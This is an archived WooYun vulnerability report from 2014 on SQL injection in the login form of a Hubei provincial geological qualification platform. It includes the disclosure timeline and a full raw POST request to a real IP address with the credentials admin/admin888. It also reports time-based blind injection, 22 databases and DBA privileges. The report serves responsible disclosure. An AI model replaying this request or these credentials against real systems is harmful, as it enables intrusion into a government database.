乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-13: 细节已通知厂商并且等待厂商处理中 2014-01-18: 厂商已经确认,细节仅向厂商公开 2014-01-28: 细节向核心白帽子及相关领域专家公开 2014-02-07: 细节向普通白帽子公开 2014-02-17: 细节向实习白帽子公开 2014-02-27: 细节向公众公开
湖北省国土资源厅地质勘查资质信息平台SQL注入
从主站跳转到这个平台,登录框处存在SQL注入
POST /website/ HTTP/1.1Host: 119.97.204.213:8001User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://119.97.204.213:8001/website/Cookie: ASP.NET_SessionId=ig1qc5biyegmuaogq5cfsg0lConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 4940__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUIODgwNjgyNDIPZBYCAgMPZBYOAgEPZBYCAgMPDxYCHgdWaXNpYmxlaGRkAgIPZBYCAgEPFgIeC18hSXRlbUNvdW50AgUWCmYPZBYCZg8VAyQ0YzQ1YWYxZC03MzNkLTRlOWItYmI4Mi1hNDQwN2E3YjI1MmJF5rmW5YyX55yB5Y6%2F5Z%2Bf55%2B%2F5Lqn6LWE5rqQ5YuY5p%2Bl5byA5Y%2BR5pW05L2T5o6o6L%2Bb6K%2BV54K55bel5L2c5bqnLi4uCTIwMTMtMTEtN2QCAQ9kFgJmDxUDJDI3NTM2N2M1LTAyZWEtNDA5Ny05N2JlLWFlNWNiNDA0YTUwOELmnY7nuqrlubPlpITplb%2FmlbToo4Xli5jmn6XljLrpmLbmrrXmgKfmiJDmnpzlrqHmn6XkvJrkuIrnmoTorrLor50JMjAxMy0xMS02ZAICD2QWAmYPFQMkZDJlODI0MTctOTFkYS00ZTZmLWJkOGEtZWNkOGIzOTU0YWViReWFs%2BS6juW%2BgeaxguOAiua5luWMl%2BecgeWcsOi0qOWLmOafpei1hOi0qOebkeedo%2BeuoeeQhuaaguihjOWKnuazlS4uLgkyMDEzLTExLTZkAgMPZBYCZg8VAyQ4OTBjMmI0NS1lN2YzLTQ3ZGQtOGMxZS01NTU5ZDdlZjU5MjQ955yB5Zu95Zyf6LWE5rqQ5Y6F5YWz5LqOMjAxMuW5tOW6puesrOS6jOaJuemigeWPkeeahOWcsOi0qC4uLgkyMDEzLTEtMzBkAgQPZBYCZg8VAyRhNTI3NzA5OS0zZGYxLTRkOTYtOTI0Ni1mMTE2YjA3Nzc1ZmYY5YWz5LqO5pil6IqC5pS%2B5YGH5YWs5ZGKCTIwMTMtMS0yMWQCAw9kFgICAQ8WAh8BAgQWCGYPZBYCZg8VAyQ3YTliMWNlMS1jYTgzLTQ5Y2MtYjFhOS04M2NmYjNhY2I1ZGU%2F5YWo5Zu95Zyw6LSo5YuY5p%2Bl5oiQ5p6c6YCa5oql5LiO5Zyw6LSo5YuY5p%2Bl6KGM5Lia6YCa5oql57yWLi4uCjIwMTMtMTItMTNkAgEPZBYCZg8VAyRkZTg2YTJjOC1mNDAxLTQwMjgtODJmNS1kNjMwY2ZlYWE2MzM35oiR55yB5o%2BQ5YmN5a6M5oiQMjAxMuW5tOW6puWcsOi0qOWLmOafpeaIkOaenOebtOaKpS4uLgkyMDEzLTEtMzBkAgIPZBYCZg8VAyQ5MmIzZjM1My01N2Y5LTRiYjAtOGMwNC0yZDQ5MDJlNDhhMzAx5YWz5LqO5pil6IqC5pS%2B5YGHIOW3peS9nOWuieaOku%2B8iOW3peS9nOWKqOaAge%2B8iQkyMDEzLTEtMjFkAgMPZBYCZg8VAyQ2ZDcyYTA4My1kMjRiLTRkOWYtYjBmMS05ZGFmN2MyZTc3ODMq5YWz5LqO6JC95a6e5Z%2BO5biC5Yac5p2R5Zyf5Zyw56Gu5p2D5oSP6KeBCTIwMTMtMS0xNGQCBA9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAiQ2NGE4NWRhNS00MzA1LTQyYWMtOWVjYS02ZjI1MDYzZmQ0MWMr5Lit5Zu95Ya26YeR5Zyw6LSo5oC75bGA5Lit5Y2X5bGA5YWtMOWFremYn2QCAQ9kFgJmDxUCJDJlMjU0ODkxLTI5ZmQtNGViOS04ZGEyLTdjZDUyY2I4NmI5YyTmuZbljJfljY7kuprlu7rorr7lt6XnqIvmnInpmZDlhazlj7hkAgIPZBYCZg8VAiQ4OTY1NDFlMy02YmI2LTQ4N2EtYTZkNy1mYTFkMjYwNjA2NWIY5rmW5YyX55yB5Zyw6LSo6LCD5p%2Bl6ZmiZAIDD2QWAmYPFQIkYmEzOTNiNDItYjJlNC00ZjU3LTg5NTYtNzllZjdiZWMwMTRkHua5luWMl%2BecgeWcsOefv%2BW7uuiuvuW3peeoi%2BmZomQCBA9kFgJmDxUCJGQ4MGVlYWFiLTUyNTYtNDg4Ny1iNTQwLTBlYzQxZGExOGFiZivkuK3lm73lhrbph5HlnLDotKjmgLvlsYDkuK3ljZflsYDlha0w5LiD6ZifZAIFD2QWAmYPFQIkMWQyMDlmNGQtMzJhNy00OWNlLTllMjQtYTNlNmIxM2ZjOTg2MOilhOaoiuW4guS4ieWFrembtuefv%2BWxseaKgOacr%2BacjeWKoeaciemZkOWFrOWPuGQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAiQwOTBhNDRjOC03M2YyLTQ1NGQtOTU5Zi1mY2ZhNmZkYWY2MWIb5rmW5YyX55yB56ys5Zub5Zyw6LSo5aSn6ZifZAIBD2QWAmYPFQIkMGI3NThhMjEtMTJiZS00YTU3LTlmMGYtMjg2YzI4MGYyZTg4G%2Ba5luWMl%2BmdnumHkeWxnuWcsOi0qOWFrOWPuGQCAg9kFgJmDxUCJDBjNTJhYzg2LWE3ZjgtNDQxYi04ODJjLTI0NjJhNmQwNzYwYjDopYTmqIrluILkuInlha3pm7bnn7%2FlsbHmioDmnK%2FmnI3liqHmnInpmZDlhazlj7hkAgMPZBYCZg8VAiQwYzVhYTBiZC0xYjdhLTRlNGUtYTc4Yi1iNDNlNTNjYmEzYzIh6ZKf56Wl5biC55%2B%2F5bGx5oqA5pyv5pyN5Yqh5Lit5b%2BDZAIED2QWAmYPFQIkMTE4ZmNhYWEtOGMwOC00MDhiLTllYTEtZGZmNjQ3MjAwMGZkKua5luWMl%2BS4reWNl%2BWLmOWvn%2BWfuuehgOW3peeoi%2BaciemZkOWFrOWPuGQCBQ9kFgJmDxUCJDEyNmNiOThiLTE4ZWUtNDgzNS1hMzU1LTMwODMzNzMyN2RmMCHmuZbljJfnnIHlrpzmmIzlnLDotKjli5jmjqLlpKfpmJ9kAgYPZBYCAgEPFgIfAQIGFgxmD2QWAmYPFQIkMDkwYTQ0YzgtNzNmMi00NTRkLTk1OWYtZmNmYTZmZGFmNjFiG%2Ba5luWMl%2BecgeesrOWbm%2BWcsOi0qOWkp%2BmYn2QCAQ9kFgJmDxUCJDBiNzU4YTIxLTEyYmUtNGE1Ny05ZjBmLTI4NmMyODBmMmU4OBvmuZbljJfpnZ7ph5HlsZ7lnLDotKjlhazlj7hkAgIPZBYCZg8VAiQwYzUyYWM4Ni1hN2Y4LTQ0MWItODgyYy0yNDYyYTZkMDc2MGIw6KWE5qiK5biC5LiJ5YWt6Zu255%2B%2F5bGx5oqA5pyv5pyN5Yqh5pyJ6ZmQ5YWs5Y%2B4ZAIDD2QWAmYPFQIkMGM1YWEwYmQtMWI3YS00ZTRlLWE3OGItYjQzZTUzY2JhM2MyIemSn%2BelpeW4guefv%2BWxseaKgOacr%2BacjeWKoeS4reW%2Fg2QCBA9kFgJmDxUCJDExOGZjYWFhLThjMDgtNDA4Yi05ZWExLWRmZjY0NzIwMDBmZCrmuZbljJfkuK3ljZfli5jlr5%2Fln7rnoYDlt6XnqIvmnInpmZDlhazlj7hkAgUPZBYCZg8VAiQxMjZjYjk4Yi0xOGVlLTQ4MzUtYTM1NS0zMDgzMzczMjdkZjAh5rmW5YyX55yB5a6c5piM5Zyw6LSo5YuY5o6i5aSn6ZifZAIHD2QWAgIBDxYCHwECBBYIZg9kFgJmDxUCF2h0dHA6Ly93d3cubmVkcC5vcmcuY24vGOaJvuefv%2BeqgeegtOaImOeVpeihjOWKqGQCAQ9kFgJmDxUCMGh0dHA6Ly93d3cuaGJsci5nb3YuY24vd3psbS9qZ2Rqdy9kamR0LzIxODg0Lmh0bUDnnIHljoXlj6zlvIDlhajns7vnu5%2FmnLrlhbPlhZrlu7rlt6XkvZzmmqjlhZrliqHlt6XkvZzln7norq3kvJogZAICD2QWAmYPFQIwaHR0cDovL3d3dy5oYmxyLmdvdi5jbi93emxtL2pnZGp3L2RqZHQvMjIzNDcuaHRtTuecgeWOheWPrOW8gOKAnOWinuW8uuWFmuaAp%2BOAgeW7iea0geS7juaUv%2BKAneS4k%2BmimOWtpuS5oOiuqOiuuuaAu%2Be7k%2BivhOiusuS8mmQCAw9kFgJmDxUCL2h0dHA6Ly93d3cuaGJsci5nb3YuY24vd3psbS96d2R0L2djeHcvMjI2OTIuaHRtP%2BWbveWcn%2Bi1hOa6kOmDqOW8gOWxleWFqOWbveKAnOWcn%2BWcsOaXpeKAneS4u%2BmimOWuo%2BS8oOWRqOa0u%2BWKqGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFEFJlc291cmNlTWFuYWdlcjEFIUxvZ2luV2ViVXNlckNvbnRyb2wxJEltYWdlQnV0dG9uMQUhTG9naW5XZWJVc2VyQ29udHJvbDEkSW1hZ2VCdXR0b24yR5dPJ3KdLpxy4pGOzOVfqLvqc8gK5p3kZP5wqDIVZUo%3D&__VIEWSTATEGENERATOR=748D4755&__EVENTVALIDATION=%2FwEWBgK5lfSeCgLk1b%2BVAgLdhOHYDwLd1oT8DQLn%2Fa%2BbCgLo%2Fa%2BbCkKL3U9ruHvJFrALwpUDWJcFbEQRh5sLLyExkG%2F4rgXi&LoginWebUserControl1%24userName=admin&LoginWebUserControl1%24passWord=admin888&LoginWebUserControl1%24ImageButton1.x=32&LoginWebUserControl1%24ImageButton1.y=15&menu1=&menu1=%23&menu1=
一共22个数据库,当前数据库”XSYSTEM“,基于时间延迟的,太慢了,就不跑了,不过还是DBA权限。。。。
找开发商吧,貌似这个开发商做的系统有几个单位在用
危害等级:高
漏洞Rank:11
确认时间:2014-01-18 09:21
暂无